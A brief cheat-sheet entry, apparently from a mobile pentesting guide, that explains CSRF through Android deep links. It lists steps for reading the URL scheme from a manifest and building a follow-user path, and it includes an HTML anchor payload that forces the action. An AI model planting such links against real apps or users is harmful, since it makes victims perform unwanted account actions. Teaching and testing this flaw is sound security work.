What is DeepLinks (CSRF)
DeepLinks in the context of CSRF (Cross-Site Request Forgery) refers to a specific attack vector that exploits deep linking functionalities in mobile or web applications.
Exploitation
# Find the android:scheme (Via Manifest)
Ex:
<data android:host="user" android:pathPrefix="/" android:scheme="pscp"/>
<data android:host="user" android:pathPrefix="/" android:scheme="pscpd"/>
--------------------------------------------------------------------------------
# Find the path URL
pscp://user/<any user-id>/follow
--------------------------------------------------------------------------------
# Build CSRF (From web, will open application)
<a href="pscp://user/<any user-id>/follow">CSRF DEMO</a> 4